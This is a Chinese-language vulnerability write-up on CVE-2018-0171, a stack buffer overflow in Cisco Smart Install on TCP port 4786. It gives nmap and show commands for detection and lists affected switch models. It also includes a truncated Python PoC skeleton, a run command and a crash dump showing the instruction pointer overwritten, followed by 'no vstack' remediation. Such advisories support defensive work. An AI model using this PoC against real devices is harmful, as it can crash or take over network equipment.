0x01前言
在Smart Install Client代碼中發現了基于堆棧的緩沖區溢出漏洞,該漏洞攻擊者無需身份驗證登入即可遠端執行任意代碼。cisco Smart Install是一種“即插即用”的配置和圖像管理功能,可為新的交換機提供簡易的部署。該功能允許使用者将思科交換機放置到到任何位置,将其安裝到網絡中,然後啟動,無需其他配置要求。是以它可以完全控制易受攻擊的網絡裝置。Smart Install是一種即插即用的配置和圖像管理的功能,為新型交換機提供良好的圖形界面管理。它能使初始化配置過程自動化,并通過目前加載作業系統的鏡像提供新的交換機。該功能還可在配置發生變化的時候提供熱插熱拔的實時備份。需要注意的是,該功能在預設情況下用戶端上是啟用了的。
0x02漏洞描述
思科 IOS 和 IOS-XE 系統 Smart Install Client 代碼中存在一處緩沖區棧溢出漏洞(CVE-2018-0171)。攻擊者可以遠端向 TCP 4786 端口發送一個惡意資料包,利用該漏洞,觸發目标裝置的棧溢出漏洞造成裝置拒絕服務(DoS)或在造成遠端指令執行,攻擊者可以遠端控制受到漏洞影響的網絡裝置。據悉,思科交換器 TCP 4786 端口是預設開放的
0x03檢查漏洞
1.如果您的思科網絡裝置開放了TCP 4786端口,則易受到攻擊,為了找到這樣的裝置,隻需通過nmap掃描目标網絡。
nmap -p T:4786 192.168.1.0/24
2.要檢查網絡裝置是否開放了Smart Install Client用戶端功能,以下示例是在顯示配置為Smart Install Clien的Cisco Catalyst交換機上的show vstack config指令輸出:
複制代碼
switch1# show vstack config
Role: Client (SmartInstall enabled)
.
switch2# show vstack config
Capability: Client
Oper Mode: Enabled
Role: Client
來自show vstack config指令輸出的Role:Client和Oper Mode:Enabled或Role:Client(已啟用SmartInstall)資訊确認裝置上已啟用了該功能。
3.思科機子上執行指令判斷,開放了4786端口即使用了SMI。
switch>show tcp brief all
TCBLocal Address Foreign Address (state)
0344B794.4786 .* LISTEN
0350A018.443 .* LISTEN
03293634.443 .* LISTEN
03292D9C.80 .* LISTEN
03292504.80 .* LISTEN
Cisco IOS和iex軟體版本檢查:
Router> show version
Cisco IOS Software, C2951 Software (C2951-UNIVERSALK9-M), Version 15.5(2)T1, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Mon 22-Jun-15 09:32 by prod_rel_team
ios-xe-device# show version
Cisco IOS Software, Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version Denali 16.2.1, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2016 by Cisco Systems, Inc.
Compiled Sun 27-Mar-16 21:47 by mcpre
4.如果您不确定您的漏洞是否受到影響,可以使用Cisco的Cisco IOS Software Checker進行檢測:
https://tools.cisco.com/security/center/softwarechecker.x
5.使用下面的腳本探測對應IP端口是否确實開放的是思科SMI協定
https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py
協定特征可以參見msf扒拉出來的
https://github.com/rapid7/metasploit-framework/commit/c67e407c9c5cd28d555e1c2614776e05b628749d
[INFO] Sending TCP probe to targetip:4786
[INFO] Smart Install Client feature active on targetip:4786
[INFO] targetip is affected
0x04 影響範圍
影響裝置:
Catalyst 4500 Supervisor Engines
Cisco Catalyst 3850 Series Switches
Cisco Catalyst 2960 Series Switches
包含部分Smart Install Client的裝置也可能受到影響:
Catalyst 3850 Series
Catalyst 3750 Series
Catalyst 3650 Series
Catalyst 3560 Series
Catalyst 2960 Series
Catalyst 2975 Series
IE 2000
IE 3000
IE 3010
IE 4000
IE 4010
IE 5000
SM-ES2 SKUs
SM-ES3 SKUs
NME-16ES-1G-P
SM-X-ES3 SKUs
0x05 漏洞驗證
以下是此漏洞驗證的PoC:
import socket
import struct
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1") parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786) (options, args) = parser.parse_args()
def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):
def send_packet(sock, packet):
def receive(sock):
if name == "main":
要攻擊交換機,則運作以下指令:
host$ ./smi_ibc_init_discovery_BoF.py-t 192.168.1.1
在交換機上應顯示崩潰資訊并重新啟動:
00:10:35 UTC Mon Mar 1 1993: Unexpected exception to CPUvector 1200, PC = 42424240
-Traceback= 42424240
Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_15
=== Flushing messages (00:10:39 UTC Mon Mar 1 1993) === Buffered messages:
...
Queued messages:
Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE11, RELEASE SOFTWARE
(fc3)
Compiled Wed 17-Aug-16 13:46 by prod_rel_team
Instruction TLB Miss Exception (0x1200)!
SRR0 = 0x42424240 SRR1 = 0x00029230 SRR2 = 0x0152ACE4 SRR3 = 0x00029230
ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x84000000 DBSR = 0x00000000
CPU Register Context:
Vector = 0x00001200 PC = 0x42424240 MSR = 0x00029230 CR = 0x33000053
LR = 0x42424242 CTR = 0x014D5268 XER = 0xC000006A
R0 = 0x42424242 R1 = 0x02B1B0B0 R2 = 0x00000000 R3 = 0x032D12B4
R4 = 0x000000B6 R5 = 0x0000001E R6 = 0xAA3BEC00 R7 = 0x00000014
R8 = 0x0000001E R9 = 0x00000000 R10 = 0x001BA800 R11 = 0xFFFFFFFF
R12 = 0x00000000 R13 = 0x00110000 R14 = 0x0131E1A8 R15 = 0x02B1B1A8
R16 = 0x02B1B128 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x02B1B128
R20 = 0x02B1B128 R21 = 0x00000001 R22 = 0x02B1B128 R23 = 0x02B1B1A8
R24 = 0x00000001 R25 = 0x00000000 R26 = 0x42424242 R27 = 0x42424242
R28 = 0x42424242 R29 = 0x42424242 R30 = 0x42424242 R31 = 0x42424242
Stack trace:
PC = 0x42424240, SP = 0x02B1B0B0
Frame 00: SP = 0x42424242 PC = 0x42424242
0x06 漏洞修複
#conf t
Enter configuration commands, one per line. End with CNTL/Z.
NSJ-131-6-16-C2960_7(config)#no vstack
NSJ-131-6-16-C2960_7(config)#exit
關鍵的就是這句 no vstack
再看,端口已經關掉了。
#show tcp brief all
TCB Local Address Foreign Address (state)
075A0088 .443 .* LISTEN
0759F6C8 .443 .* LISTEN
0759ED08 .80 .* LISTEN
0759E348 .80 .* LISTEN
0x06 漏洞危害
可能會導緻攻擊者在受影響的裝置上導緻緩沖區溢出,這可能會産生如下影響:
觸發裝置的重新加載
允許攻擊者在裝置上執行任意代碼
在受影響的裝置上引發無限循環重新開機,是裝置崩潰
0x07 漏洞修複
0x08 參考文獻
https://embedi.com/blog/cisco-smart-install-remote-code-execution/
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
https://www.anquanke.com/post/id/103122
https://mp.weixin.qq.com/s/cMYUuGFmox5PK89fO_eR8w
https://www.youtube.com/watch?v=CE7KNK6UJuk&feature=youtu.be&t=99
https://www.youtube.com/watch?v=TSg5EZVudNU&feature=youtu.be
原文:http://www.cnblogs.com/backlion/p/8675854.html